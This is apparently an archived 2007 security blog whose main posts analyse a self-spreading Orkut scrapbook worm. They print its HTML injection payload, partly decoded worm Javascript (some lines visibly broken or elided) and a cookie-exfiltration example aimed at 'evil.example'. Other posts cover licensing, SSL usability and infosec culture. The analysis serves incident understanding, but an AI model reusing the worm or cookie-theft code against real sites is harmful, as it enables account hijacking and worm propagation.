Wednesday, December 19, 2007

More on Orkut worm

Yes, my HTML/Javascript-fu is weak. So much so that I didn't know we were dealing with pure Javascript. Javascript that just happens to exist to facilitate posting Flash movies and games, so that's why it has "Flash" written all over it.

To back up several steps... I received an email from Orkut saying that someone I know had left me a scrapbook entry. I went and looked at it, and was puzzling over the non-Englishness of it from someone whom I know is an English speaker. Of course during that time my browser (Firefox on OS X) was busy doing the same to my Orkut contacts. Sorry about that guys!

One of them is Jeremy Rauch. Within minutes of me looking at my scrapbook, I get email that Jeremy and others have now left me new scrapbook entries. This is about when I start to guess what's going on. I mail Jeremy to point out that he seems to have it now, and he says he knows... I gave it to him. Whoops! Jeremy was skeptical that Flash was really involved, since he has it blocked in his browser by default. He was right.

So here is what I think is happening, to the best of my ability as someone with weak Javascript-fu. Take a look at the chunk of HTML that ends up as a scrapbook entry that I posted earlier.

It obviously pulls in a chunk of Javascript that is even named "virus.js". But why all the trickery with the Shockwave and flash stuff? If Orkut allows posting raw HTML, why the games? Why not just source virus.js and be done with it?

So I did some experiments tonight. I tried the old script-tag trick, an alert('hello, I'm an XSS'), etc., and that doesn't work. It says my rich content was rejected, see here.

And yet, I can paste in the much more complicated embed-a-Flash-movie chunk, and that DOES work. Though, it made me fill in a CAPTCHA. I suspect that CAPTCHA is brand new as of tonight; otherwise I'm not seeing how the worm worked so well.

So the basic security challenge for Orkut here is that they want to allow some arbitrary HTML, but not others. As we have seen for many years with web-based email, that's a pretty hard problem to solve.
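
To make that concrete, here's a minimal sketch (not Orkut's actual filter) of why blocklist-style HTML filtering fails: stripping script tags does nothing about payloads that ride along in attributes of the tags you meant to allow.

```javascript
// A naive blocklist sanitizer: strips literal <script> blocks, the
// "obvious" XSS vector. This is a sketch, not Orkut's real filter.
function naiveSanitize(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

// A payload hiding in an attribute of an element the site wants to
// allow sails straight through (the event handler is illustrative):
var attack = '<embed src="movie.swf" onload="alert(document.cookie)">';
console.log(naiveSanitize(attack) === attack);  // → true: the filter missed it
```

Allowlisting known-good tags and attributes works better, but as the webmail folks can attest, even that is full of parser-differential surprises.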

So that's why the hoops to jump through. The worm author needed something that looked like a flash movie so that Orkut would allow posting it, but in fact allowed him to pull in arbitrary Javascript.

This is where the SWFObject library comes into play. Its purpose in life is to make it easier to embed Flash content and have it play properly across browsers. Orkut is nice enough to make this library available to every browser that loads the Scrapbook (and probably other) pages: they host a copy themselves and source it for you.

It looks to me like the worm author is able to build a SWFObject that includes the Javascript and causes it to be embedded in the Orkut page, thereby acting in the right context to have access to your Orkut cookies and all the good stuff that an AJAX worm needs. MySpace isn't alone in having all the good Web 2.0 worms anymore.
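
As a sketch of why that context matters: once any attacker Javascript executes in the page, pulling in more is one DOM call away, exactly like the createElement('script') sequence visible in the payload I posted. (The doc parameter is there so the sketch is testable; in a browser it's just document, and the URL is a placeholder, not the worm's real one.)

```javascript
// Sketch of the script-injection step the worm's payload uses: one DOM
// call loads arbitrary new Javascript in the page's security context.
function injectScript(doc, src) {
  var script = doc.createElement('script');
  script.src = src;
  doc.getElementsByTagName('head')[0].appendChild(script);
  return script;
}
```

In the actual payload this runs inline, right after the SWFObject setup, with src pointed at the worm's virus.js.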

Jeremy decoded and prettied up the obfuscated Javascript; you can see that code at the end. If you're watching carefully, you'll notice this version has a different message as the scrap body than the one I originally posted. That means the person who controls the virus.js download page (presumably the worm author) has revved the file at least once; I have two different (obfuscated) versions. Since I believe Orkut was taking active measures to shut this thing down, I'm guessing the author changed the text in case Orkut was keying off it.
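
For anyone who wants to repeat the exercise, the deobfuscation step is usually mechanical: this style of obfuscation hides strings as char-code lists, so String.fromCharCode recovers them. A hypothetical round-trip in the same style (not the worm's exact encoding):

```javascript
// Turn a string into char codes the way an obfuscator would, then
// recover it the way you would when decoding. Illustrative only.
function toCharCodes(s) {
  var codes = [];
  for (var i = 0; i < s.length; i++) codes.push(s.charCodeAt(i));
  return codes;
}

var hidden = toCharCodes('virus.js');        // e.g. [118, 105, 114, ...]
var recovered = String.fromCharCode.apply(null, hidden);
console.log(recovered);                      // → "virus.js"
```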

Like I mentioned before, if the CAPTCHA is new, that should essentially stop this thing from spreading. This kind of worm has interesting implications for social sites. If this gets to be really common, it means you'll be answering CAPTCHAs or something similar left and right.

Also worth noting is that stopping the worm doesn't stop other interesting attacks. I was still able to post the same embed chunk of code to my own scrapbook as an experiment, I just had to answer the CAPTCHA. So a human could still put something there. If they can use it to run Javascript, that still leaves open attacks where they can steal your cookies.
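
For example, even a fairly constrained script can leak document.cookie by encoding it into a URL it asks the browser to fetch. A hedged sketch; the exfil URL and cookie names are made up:

```javascript
// Builds the kind of exfiltration URL a cookie-stealing script would
// request, e.g. via `new Image().src = ...`. Hypothetical URL/cookie.
function buildExfilUrl(exfilUrl, cookies) {
  return exfilUrl + '?c=' + encodeURIComponent(cookies);
}

// In a browser, the attacker would do something like:
//   new Image().src = buildExfilUrl('http://evil.example/log', document.cookie);
```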

It looks like the immediate problem is over. I probably won't have a lot more technical to say on this one. I hope that the Jeremiahs and RSnakes of the world will jump in soon and tell me how the worm actually works.

Decoded Javascript:

// Note: the decode lost some lines along the way. Calls like the
//'s below are restored from the obvious standard patterns,
// and chunks that didn't survive are marked "... elided ...".

var index = 0;
var SIG = JSHDF["Page.signature.raw"];

// Cross-browser XMLHttpRequest factory: the standard three-way fallback.
function createXMLHttpRequest() {
    try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) {}
    try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {}
    try { return new XMLHttpRequest(); } catch (e) {}
    return null;
}

// The classic cookie-utility trio.
function setCookie(name, value, expires, path, domain, secure) {
    var curCookie = name + "=" + escape(value) +
        (expires ? ";expires=" + expires.toGMTString() : "") +
        (path ? ";path=" + path : "") +
        (domain ? ";domain=" + domain : "") +
        (secure ? ";secure" : "");
    document.cookie = curCookie;
}

function getCookie(name) {
    var dc = document.cookie;
    var prefix = name + "=";
    var begin = dc.indexOf(";" + prefix);
    if (begin == -1) {
        begin = dc.indexOf(prefix);
        if (begin != 0) return false;
    } else {
        begin += 1;
    }
    var end = document.cookie.indexOf(";", begin);
    if (end == -1) end = dc.length;
    return unescape(dc.substring(begin + prefix.length, end));
}

function deleteCookie(name, path, domain) {
    if (getCookie(name)) {
        document.cookie = name + "=" +
            (path ? ";path=" + path : "") +
            (domain ? ";domain=" + domain : "") +
            ";expires=Thu, 01-Jan-70 00:00:01 GMT";
    }
}

// Scrapes the victim's friends list out of a <select> on an Orkut page.
// The request and parsing in the middle did not survive the dump.
function loadFriends() {
    var xml = createXMLHttpRequest();
    // ... request elided ...
    var xmlr = xml.responseText;
    var div = document.createElement("div");
    // ... response parsed into div ...
    var select = div.getElementsByTagName("select").item(0);
    // ...
}

// Joins the victim to the worm's community; the char codes decode to
// the community ID "44001818". The base URL was stripped from the dump.
function cmm_join() {
    var send = "POST_TOKEN=" + encodeURIComponent(POST) +
        "&signature=" + encodeURIComponent(SIG) + "&Action.join";
    var xml = createXMLHttpRequest();'POST', '' + String.fromCharCode(52, 52, 48, 48, 49, 56, 49, 56), true);
    // ... headers and xml.send(send) elided ...
}

// Posts the scrap to the next friend on the list. The scrap text
// translates to "Happy end-of-year holidays!"
function sendScrap() {
    var scrapText = "Boas festas de final de ano![silver]" + new Date().getTime() + "[/silver] ";
    var send = "Action.submit=1&POST_TOKEN=" + encodeURIComponent(POST) +
        "&scrapText=" + encodeURIComponent(scrapText) +
        "&signature=" + encodeURIComponent(SIG) +
        "&toUserId=" + document.getElementById("selectedList").item(index).value;
    var xml = createXMLHttpRequest();"POST", "", true);
    // ... xml.send(send) and a timing loop (var wDate = new Date) elided ...
}


Tuesday, December 18, 2007

Orkut "virus"

More of a worm, actually.

I had an email from Orkut this evening telling me I had a new scrapbook entry. I don't really use Orkut, but I signed up a while back, and friended a bunch of people I know. The scrapbook entry was a bit cryptic:
2008 vem ai... que ele comece mto bem para vc
(Roughly: "2008 is on its way... may it start off really well for you.")

It's Portuguese, heavy on the SMS-style abbreviations, which is probably why Babelfish wasn't any help. I won't mention who I got it from, but I will admit that if you are friended by me on Orkut, I probably gave you a copy too. Fortunately, it looks like Orkut is actively and quickly deleting them to stop the spread. I say, completely unsarcastically: good job on the quick response, Orkut!

I haven't done any kind of thorough analysis yet, but it looks like a Javascript worm that kicks in via a Flash XSS? My HTML/Javascript/Flash-fu is pretty darn weak. This is what it looked like:

<div id="flashDiv295378627"><embed type="application/x-shockwave-flash" src="Scrapbook_files/LoL.html" style="" id="295378627" name="295378627" bgcolor="#FFFFFF" quality="autohigh" wmode="transparent" allownetworking="internal" allowscriptaccess="never" height="1" width="1"></embed></div><script type="text/javascript"> var flashWriter = new _SWFObject('', '295378627', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '295378627'); flashWriter._addParam('wmode', 'transparent'); script=document.createElement('script');script.src='';document.getElementsByTagName('head')[0].appendChild(script);escape(''); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv295378627');</script>

Looks like it joins you to an Orkut group, too:

Infectados pelo Vírus do Orkut. ("Infected by the Orkut Virus.")

Owner of the group is a new-looking account named "Virus do Orkut". Also, listed at the end of the virus.js file is this: author="Rodrigo Lacerda"

Tuesday, October 30, 2007

Comment spammers

The comment spammers have finally found me. I have tried deleting the comments manually, but they just post a couple more every day. I've turned on CAPTCHAs, we'll see how that works. I'm loath to put any barriers in for people wanting to comment, so sorry about that.

Tuesday, July 31, 2007

Off to vegas 2007

I'm on my way to Las Vegas for Black Hat & Defcon. For Black Hat, it looks like I'm doing a booksigning on Wednesday at 4:30. BigFix is hosting the Gala at 6:00 on Wednesday as well, so I will be putting in an appearance. Please come say hi if you're around. I will also be at Defcon, but good luck spotting me in the crowd there if you don't already know what I look like.

I look forward to catching up with friends I only get to see at cons.

Thursday, July 19, 2007

The Ladies of Infosec

I was at an event not long ago, and the woman in the group was really pissed. In a room full of nothing but security geeks, someone asked her "Oh, do you do security work?"

This didn't happen with any of the guys. The question they got was "Where do you work?"

I was thinking about this today, and I realized that every woman I know who works in infosec has told me a similar story. That might be a slight exaggeration, but not much. Literally every one I can think of right now has told me one of these stories.

They get things like:
  • Are you here with your boyfriend?
  • She used to be a man
  • Take your shirt off
Yes, sadly I have heard jerks yell out "take your shirt off" when a woman was trying to give a talk.

How much do women hate this? You can read what Raven thinks about it.

Let me tell you a little about the particular woman in question who reminded me of all this. She has worked in the security groups of some of the most important software companies in the world. She has worked at at least two security companies that I know of. Pick just about any well-known male in security, and he knows who she is and respects her work.

If you've been paying attention to the infosec world, you probably know who I'm talking about. Keep it to yourself, because this particular woman is not the point.

I have met a number of women at various conferences. I'd look really foolish if I went around assuming they weren't attendees or didn't know what they were doing. I've met a woman who works for the CIA. I've met one who was a heavy-duty cryptographer. I've met one who does BGP vulnerability research. Yes, the women are rare. Staring and asking stupid questions doesn't help improve that.

Because of how hostile the infosec world is to women, the ones who manage to survive tend to really love what they do, and have worked very hard to stay in the field. This may mean that the woman you just met is better at security than 90% of the men. That probably includes you (and I'll happily concede that includes me.)

Keep that in mind.

Wednesday, July 18, 2007

BaySec 3 Tonight!

BaySec 3 is tonight, July 18 2007.

Per Nate:
July 18th, 7-11 pm or so.
O'Neills Irish Pub
747 3rd St (at King)

Tuesday, July 17, 2007

The BigFix logo

I promised to keep my work blogging on the work blog, unless I thought I had been particularly clever. I think this one qualifies.

Wednesday, June 20, 2007

BaySec 2

BaySec 2 is tonight, June 20 2007.

Details here.

Hope to see you there!

Wednesday, June 06, 2007

Attention Jed Pickel

It appears that I owe you a big apology. You were right, I was wrong.

(It's amazing the stuff you find when googling yourself.)

Monday, June 04, 2007

Open Source Remorse

So rather than continuing to carry on in the Matasano blog comments (1, 2) and being mirrored in Alan's blog, I figure I should gather my thoughts on this subject in my own long-winded blog entry.

Now, my recent comments have been prompted by Alan's and Tom's comments at each other, but they aren't about that per se. I gather the background there is that StillSecure has released Cobia, which includes Snort (and other open-source bits?), but the Cobia bits aren't GPL. I really don't know anything about whether there's any inappropriate linking going on; I haven't looked at it. The StillSecure guys raise some legal doubts about the GPL, and Tom points to Marty's post about the "clarifications" in the Snort license.

(Update: Alan tells me that Cobia does NOT include Snort, leaving me wondering what Tom was upset about in the first place. Shrug. Sorry about further muddying things with my incorrect claim, Alan.)

The key point that Tom raises that I want to take issue with is this:
Why do I care? Because companies like StillSecure are driving open-source projects “underground”, into proprietary licenses. Wow, that sucks.
Now, let's hang on a second there. It looks more to me like a basic desire to make money has caused the open-source security tools developers to start changing their licenses.

They have open source remorse.

It looks more to me like they are finding it difficult to get people to pay them when their stuff is licensed only under a GPL license. Obviously, if the software is only available under the GPL, then anything else it goes into also needs to be GPL. (Modulo calling vs. linking vs. straight source modification, etc... I'm not here to try to hash that mess out.)

I've watched this happen with BitTorrent, Nessus, nmap, and Snort.

Is there anything wrong with making money with software? Certainly not. I've worked at Sybase, contracted at ArcSight, tried my own hand with Enforcer for AnchorIS, and am currently about 4 years in at BigFix. BigFix, by the way, has licensed nmap for commercial use, and Fyodor's licensing terms were very reasonable. All those companies I worked at are traditional, closed-source software vendors. So I fully stand behind profiting from software licensing.

We are salesmen, and completely up-front about that.

But I believe there is a different standard if you're going to go the open-source route. Maybe I'm too much of an idealist, but then, the GPL is kind of an idealist license.

So here's the game: You create some very early, proof-of-concept open-source security tool. Maybe you're early to the market, or maybe you have some genuinely nifty feature, but you're a known concept, an IDS or a scanner.

How do you gain popularity? Well, frankly, being free can be a huge help. And if you're not doing it for a living anyway, it works for everyone. What do most open-source projects want? Help. For the packages I've mentioned, they got it.

Maybe it wasn't in the form of (much) code. But it was in the form of signatures, QA, people running mailing lists, people submitting fingerprints and banners for obscure software, filing bug reports and feature requests, help compiling on weird unixes, packet captures, books, articles, and other general evangelism. The license also allows every Linux distro in the world to ship your stuff, further cementing you as a de-facto standard.

Those things are absolutely massive contributions for a young project. I don't wish to discount the efforts of the key developers on each of those projects. The packages would most certainly have fallen into obscurity without their leadership. But even then, you don't maintain such a project for years without a positive feedback loop.

But for the projects mentioned, the maintainers eventually decided they would like to make a living off the project.

This is where I admit that I don't know what's in the hearts and minds of the people who are now selling commercial licenses for these projects. I can only judge based on their actions and published licenses.

But it sure looks like they're taking the combination of their own work and the community support, and selling it for a profit.

Why do I care? Because I believe that a lot of people, myself included, gave support because they thought they were helping out a project that was only under a GPL license. Changing it after the fact strikes me as a kind of dishonesty. If you help out a commercial software company, great. You knew what you were helping. I know a lot of people who do free QA for Microsoft.

But if you think you're contributing to a project because your help will always be available to the world, and you'll find it in your favorite latest Linux distro, sorry. Nessus is all the way there, no new Nessus for anyone who doesn't want to register, download and install it themselves, and so on. And no source. Snort and nmap can still be shipped around, but we'll see if it stays that way. No more free Snort sig feeds for you though, if I recall correctly.

I should clarify a point. I keep talking like these projects aren't GPL anymore. That's because I don't think they are, at least not entirely. Nessus clearly isn't anymore. No question there. How about Snort and nmap which have commercial versions available for licensing?

Marty asks in the Matasano blog comments next to me "Snort isn't GPL?"


So you can take Snort and code on it or mix it with other code, and your users can demand the source from you under the GPL terms. That seems pretty GPL, right? So what if your code is in Snort, and SourceFire sells a license to a commercial software vendor. Can you make that vendor give you a copy of their source?


Anyone remember the point of the GPL? It's so that no one can take your code away from you.

So you might be wondering, how can they take your GPL code and sell it under another license? Am I accusing these projects of stealing code? No, not really. I assume that they have acquired the rights to all the bits of code or have purged the stuff they can't track down.

Yes, this does mean they had to have planned this for a while. They had to stop taking contributions from all the outsiders or people who will only submit GPL code. I believe these guys are smart enough to get this right, though I wouldn't mind seeing how they went about auditing the codebase.

Does this mean they can never take outside code again? Well, it means the submitter has to be willing to give them a license to do whatever they want with it, including selling it non-GPL'd. This would include, say, people working on it for the Google Summer of Code.

SourceFire has that part tied up rather neatly, too. If you read Marty's "clarifications", you'll see that if you get your code near any SourceFire people, then you automagically grant them the right to sell it as closed-source.

So no, not GPL.

Another interesting thing about the GPL, it only covers code and maybe some docs. If you made some other kind of contribution like the ones I mentioned earlier, not covered. They can just take it and sell it.

So who is really killing GPL'd projects? If you think StillSecure is stealing without giving back, I'm not seeing how SourceFire isn't doing some of the same.

I've met Fyodor and a bunch of the SourceFire guys a number of times. I don't have anything against them personally, and it's not like I don't wish them financial success. I just wish they had either had the license they really wanted in the first place, or didn't go changing it late in the game.

Saturday, June 02, 2007

That's your manifesto?

Pete Lindstrom posts his Secure Software Manifesto. Pete, you'll have to do better than that. I guess a manifesto is not a thesis, it's not intended to be a self-contained set of assertions and evidence. But I feel it necessary to call out what look like some glaring factual errors and inconsistencies to me.

1. Public vulnerability information (e.g. CVE, disclosure info, etc.) provides data about the activities of the hacker/bugfinder/security researcher community; it tells us nothing about the absolute or relative level of vulnerability of software.
On the contrary, I think the effort required to find bugs, and the rate and volume at which they are discovered are the best indicators of the relative level of security of a software package. I will agree that this doesn't tell us the absolute number of vulnerabilities left. There's always the chance that the researchers found the absolutely last bug in a package on the 31st while doing their Month of x Bugs.

The past is not necessarily a predictor of the future, but the past may be a predictor of the more recent past. Or you might prefer correlator. I believe the data is all there for someone who wants to, say, take the bugs for packages from 2005 and see how they correlated with bugs in 2006. At least for known bugs.
2. The defining aspect of a software program's vulnerable state is the number of vulnerabilities (known or unknown) that exist in the software. It is not how hard programmers try not to program vulnerabilities nor how hard others try to find the vulnerabilities.
The first sentence is a fine definition. The second sentence seems to be trying to distance itself from the first, though. If you try hard to create fewer vulnerabilities (and have some talent and experience in that), don't you think you will create fewer vulnerabilities? And if you missed some, and others find them and you fix them, don't you mostly end up with fewer vulnerabilities?

So no, using the definition of "vulnerable" to mean there is at least one vulnerability left, there's probably no amount of effort you can expend that is going to get that count to zero. But don't we want software packages that have fewer vulnerabilities, if you can't have zero?

Because if there's no value to that, I know lots of people who could be doing something else with their time.
3. The contribution of a patch to the vulnerable state of a software program is a tradeoff between the specific vulnerability (or set of vulnerabilities) it fixes and the potential new vulnerabilities it introduces.
Sure. Do you mean to imply that patches often introduce new problems? I'm kinda under the impression that's relatively uncommon, but I'd be willing to be proven wrong.
4. There is currently no known measurement that determines or predicts the vulnerable state of a software program.
False. If you use the definition of "vulnerable" meaning that there is at least one vulnerability, then I have a program that will read any other program of some minimum complexity, and return the probability that it is vulnerable. The answer is usually 1. I'm very confident in my low false-positive rate.

Facetiousness aside, I agree that there is no metric or program to find, or even count, all of the vulnerabilities in a program. Maybe not even most of them.

But there are programs, services and consulting that will find "some". Is there value in finding "some"? Is it useful to know how hard it was to find "some"?
5. We don't know how many "undercover" vulnerabilities are possessed and/or in use by the bad guys, therefore we must develop solutions that don't rely on known vulnerabilities for protection.
Once again, I agree with your opening statement, and am left wondering where you got that particular conclusion. Why not "therefore we must find and fix as many vulnerabilities as possible" or "therefore we must infiltrate the underground and gather intelligence"?
6. The single best thing any developer can do today to assist in protecting a software program is to systematically, comprehensively describe how the software is intended to operate in machine (and preferably human) readable language.
As a QA guy, I'd have to say that would be really, really awesome. Yes, can I have that please? But if I had that, isn't that the same as programmers trying hard, à la your point 2?

Wednesday, May 16, 2007

BaySec 1 Tonight!

BaySec is this evening. Hope to see you there!

Also, there is now a CitySec site for organizing these things. I know it's unlikely that you care about the city meetups but aren't already reading the Matasano blog, so you probably know this. But I mention it for completeness' sake, and for the search engines and so on.

Saturday, May 05, 2007


The first San Francisco-area Matasano-inspired BaySec get together is Wednesday May 16 2007, 7:00 PM at Zeitgeist. They tell me they don't do reservations, and the best thing is to show up early and stake out your seats. Sounds like an invitation to take over the place to me.

Likely attendees (aka those of us who have been conspiring to get BaySec started) are Raffael Marty, Anton Chuvakin, Nate Lawson, and more importantly, you.

There's a mailing list, courtesy of Tom Ptacek:
baysec at sockpuppet dot org
baysec-subscribe at sockpuppet dot org

Hope to see you there, and please spread the word.

Tuesday, April 03, 2007

Why SSL sucks

Recent posts about security protocols like SSL and DNSSEC got me thinking. In an orthogonal direction.

You know what's wrong with protocols like SSL, SSH and PGP/GPG? They let users pick the stupid. Bruce Schneier has trained me to call this the "dancing pigs" problem, though I'm too lazy to go look up the guy Bruce says he got it from.

It goes like this: "There's a problem with the security gizmo; click OK to see the dancing pigs."

Unless you're a security researcher who lives for the chance to investigate a malicious server, you just click OK to see the dancing pigs.

All my kids have been computer users since before they could read. They don't know what the dialog says, but they learn to click OK to see the dancing pigs. Even when they do learn how to read, they aren't necessarily so concerned with expired certificates or DNS name mismatches.

The reason these protocols all suck is because they let just anybody make the security policy decisions. Stupid.

(OK, so it's not the protocols/file formats themselves, just every app that implements them.)

So, what am I suggesting instead?

Dan Kaminsky wrote an excellent chapter on spoofing for me, for the first edition of Hack Proofing your Network. I hope to have it available for download one of these days. In it, he makes a perfect case for reliability == security. If your service is going down all the time, then you are being trained to live with unreliability and ignore strange problems. Your judgment is shot.

So much for the idea that a DoS isn't a security problem.

As a QA guy, I really want bugs to crash, and crash hard. Crash dump or core file too, please. The alternative is random behavior, unreproducible issues, caught exceptions that I really needed to know about, and maybe memory scribbling that could exhibit random symptoms. You don't want it to be kinda tolerable, not that big of a deal, I haven't seen it in a while I guess it's gone kind of a problem.

So security protocols need to break and break hard.

If there's a problem with the certificate, then just drop the connection. Don't prompt the user. Don't try to rate how bad of a problem it is. Don't toss a yield sign in the corner, don't show me a key with fewer teeth. Just stop.
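
In code terms, the policy I'm asking for is trivial: every check either passes or the connection dies, with no third "ask the user" outcome. A sketch, with a made-up certificate shape (these fields aren't any real TLS library's API):

```javascript
// Fail-closed certificate policy: any defect is fatal, no prompts.
// `now` and `notAfter` are plain timestamps for illustration.
function checkCert(cert, now, expectedHost) {
  if (now > cert.notAfter) throw new Error('certificate expired');
  if (cert.subjectCN !== expectedHost) throw new Error('hostname mismatch');
  if (!cert.trustedChain) throw new Error('untrusted issuer');
  return true;  // connect only on a completely clean certificate
}
```

There is no "warn" return value; the only outcomes are a connection or an exception the caller can't click through.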

If the SSH server keys have changed, don't connect. Don't offer to connect anyway. Don't ask if I want to save over my keys. Don't tell me the command-line switch to disable my security.

If the GPG email signature doesn't verify, don't let me read it anyway. Don't invite me to keep searching keyservers until I happen to find one with keys that agree.

Why? Because if it breaks properly, people will be forced to get someone competent to fix it. And they will HAVE to fix it.

Examples. If someone's SSL cert expires, right now they can sort of ignore it for a little while, or tell people to click OK, and so on. Do it my way, and it breaks entirely, and the person who should have renewed the cert does so, right now. Don't get me started on self-signed certs. If you've done something and blown away your server SSH keys, you think no big deal, just tell everyone to accept the new ones. Do this enough, and what have you trained users to do? If instead SSH doesn't work at all, how much more careful would you be about bothering to restore the original SSH keys?

But this is painful for people? That's the point. People learn through pain. Some things should be punished. Some events should be disruptive.

People should be trained to take security seriously.

Tuesday, March 27, 2007

I'm glad you got your kid back

Erik takes his kids to Disneyland, but manages to lose the 3-year-old. But that's OK, he had hung a USB flash drive around the kid's neck, and had him back within 13 minutes.
Our three year old did just what we thought he would do - Disappeared. Within 13 minutes of being ‘lost’ though, my cellphone rang.
The little scamp.

Anyway, I actually am glad he got his kid back so quickly. Nothing is worse than having your young child go missing. But...

So the father planned ahead, that's good. If you'd like to do the same yourself, I see that SurplusComputers has a 2-pack of similar-sounding drives for about $8.

But I can't say I recommend you do that. Instead, I recommend that you plant the equivalent of a dog tag on your kid. It's no worse than the USB version, and you're much more likely to get someone with a cell phone and no computer handy to just read the tag and call you.

Heck, if you know you're probably going to lose your kid at Disneyland, I bet you could get them back in just 5 minutes with the dog tag.

Oh, and I see the lost USB drive thing just relies on Autorun to pop up the message. Disneyland Security, you just got pwned by a 3-year-old. Pentesters, are you paying attention?

Found via The Disney Blog.

Saturday, March 24, 2007

Owning up

If you're a software vendor and a researcher comes along and claims there's a problem with one of your offerings, and you (the vendor) think there is not, you issue a public statement to the contrary. That's fair.

However, if the researcher persists and manages to prove his or her case to you, what do you do?

If you're Microsoft, you own up to the problem, and thank the researcher for making you understand.

Exhibit 1
Exhibit 2

That sure looks like the right way to do things to me. At least, the drama will probably only last about a week.

Monday, March 12, 2007


Great short blog entry by Larry Osterman about FPO. I've certainly seen any number of functions that work both ways, but I never knew it had a name, and I hadn't picked up the implication for debugger stack traces.

Thursday, March 08, 2007

Official shilling

My employer BigFix has launched a company blog. I have written my first entry responding to a post on Ross Brown's blog.

Anything that's strictly a BigFix topic, I'll probably do over there from now on. Though, if I think I've been especially clever or something I may drop a pointer here as well. I can think of at least one thing coming up in the future that will be posted over there that I will probably want to share. It's a follow-up of sorts to my previous Rubik-related post.

Thursday, February 22, 2007

Julie Amero add'l

Brian Livingston gave me permission to write my Windows Secrets article this time about Julie Amero. I'm grateful that he allowed me to use my space there (which is a paid gig for me) to help spread the word. Brian is sympathetic to her situation as well, and you may have seen him quoted in the New York Times story about it. In addition, he made it the Top Story, which means it goes to ALL subscribers, not just paid subscribers. It also means I can link to it from anywhere, like I just did.

If you don't know about Julie's situation, you can read my article, and there are some links in it to others that give more background. If you read security blogs at all, you probably already know all this, so I won't cover it here. The reason I haven't mentioned it before is because I was preparing that article, and because I have been working behind the scenes with others, as hinted at in the article.

I can be long-winded, so my article was over twice the length it was supposed to be, and had to be cut down a bit for the newsletter. I wanted to use the extra material here, and make an update or two.

In the ComputerCOP Pro section, I originally had this:

So what did the detective use to examine the "image"? He used a program called Computer COP Pro. Here's an example entry from the FAQ:
Q. Does Professional require training to use?

A. For a competent computer user, Professional truly does not need training to use as the detailed search applications are performed automatically by the software and the product does come with a Getting Started manual. However, because you may need to testify in court or in a hearing, it would be best to receive the company's training and certification.
So, training would be nice, but you can get away with not doing it if it's inconvenient. I'm told that training consists of an hour on the phone.

Needless to say, this program really doesn't sound like it would meet my standards for a forensics utility.


Since this is a key portion of the prosecution's case, Alex Shipp contacted a representative from the makers of ComputerCOP about this aspect of their software. Alex tells me:
Allison Whitney, director of communications for ComputerCOP, confirmed that the product was unable to distinguish between URLs visited as a result of malicious software, and URLs visited by direct user action.

She also confirmed that this point is not made clear during the ComputerCOP training. At this point in time, ComputerCOP have no plans to contact the Connecticut court to point out the errors in interpretation of the ComputerCOP output made by the prosecution attorney and prosecution expert witness.

Why didn't the defense present these kinds of findings? They tried. There appears to have been a procedural error on the defense's part, and the judge would not allow the defense to enter their evidence. The defense expert has publicly stated that his analysis of the computer files would have revealed that spyware was causing the pop-ups to appear and he feels the evidence would have totally exonerated Julie.

[end of extra material]

Speaking of procedural errors on the defense attorney's part, it appears that Julie is getting a new lawyer, and this may delay sentencing. This is good news. The article makes the new lawyer out to be a hot shot, which is exactly what Julie needs. Despite the fact that she has been declared guilty already, there are a couple of small chances for the case to be resolved before sentencing still, from what I understand. The prosecution could realize that there has been an error in the facts presented, and request that the verdict be vacated, for example. I'm obviously not a lawyer, so apologies if I have abused the terminology.

Despite the TV shows you see, I'm learning that appeals aren't as easy to get as you would think, so anything that helps slow this train wreck down and bring some sanity into the situation is a welcome development.

Saturday, February 10, 2007

Apple vs. Maynor update

I had a great time chatting with people at the security bloggers meetup the other night. There were any number of "I didn't know you blogged" moments all around. Two of the guys I spent some time talking with were David Maynor and Robert Graham who have recently formed Errata Security. And yes! they are blogging too.

We chatted about all kinds of things. We chatted about Robert moving on after IBM acquired ISS. It seems that David found some reason to move on from his position at SecureWorks, too. And then we went to dinner at some Mediterranean tapas place, and chatted some more. They bought. Thanks for the dinner, guys!

So when I got back home, I tracked down their blog, and there's some good stuff there. Hey look, there's this one particular entry from David. Looks like he's tired of keeping his mouth shut about the Mac wireless hack thing. Short version of my take on the issue: I believe David and Johnny.

But at this point, I do have to agree that some opportunities have been lost. The Matasano guys propose some hoops that researchers should be going through. Frankly, I thought that was a little silly and totally unnecessary. Even in David's case. I never thought for a second that Apple would ship the patch while still claiming that David and Johnny found nothing. I was wrong on both counts.

So unfortunately, this leaves room for the next bit of stupidity. If/when David ever decides to demo owning the built-in wireless, or release an exploit, etc... then the Mac zealots will claim that he must have reverse-engineered the Apple patch, and that he never found anything ahead of time.

Because David can reverse engineer the patch and write a working exploit, but he's not capable of finding the hole in the first place, right? And the hole that Apple fixed just coincidentally is in the area that the original Black Hat talk covered. And the holes in other OSes that they found of the same class aren't related. And HD Moore using their fuzzer and finding a similar hole in OS X has nothing to do with it.

One of these days, I hope David drops more info. At this point though, it looks like Apple has been largely successful. They have managed to drag things out long enough and tell enough half-truths that their customers believe Apple. So it's likely that few zealots will be swayed when David finally presents proof. There will just be further dismissals from people who really don't understand security very well. I still look forward to it, though.

Hey look, David is speaking a couple of times at Black Hat Federal later this month.

I'm in ur package, playing with ur puzzlez

So one of the developers I work with, Dave, is quite the twisty-puzzle fanatic. Take a look at some of his photos on flickr, and you'll see what I mean. Here's something like 1/3 to 1/2 of what he has in his office at work:

As you might imagine, Dave is also on all the various puzzle sites, and knows which puzzles are rare, which are worth the most, and which ones he doesn't have. Recently, he worked out a trade with some other puzzle collector in another country. He shipped a Square-1 in exchange for a few other puzzles. This is what arrived in the mail:

Yes, go ahead and look at the larger version of that pic. That's the Department of Homeland Security logo. So what was inside that caused such alarm that they had to open his package in transit to inspect it?

We suspect it was the rare and unusual Rubik's Hat that caught their attention. Had it been your run-of-the-mill 3x3, I doubt they would have felt it necessary to play with it. Or maybe they saw The Da Vinci Code recently, and it looked like a cryptex on the x-ray?

Rubik-sniffing dogs?

Dave did note that whoever was fondling his hat didn't seem to have any luck solving it. Good thing he didn't trade for something with batteries and wires.

Update: As if to further prove his cube-geekiness (did I mention that he placed fairly well at the recent cube-solving time trials?) Dave writes:

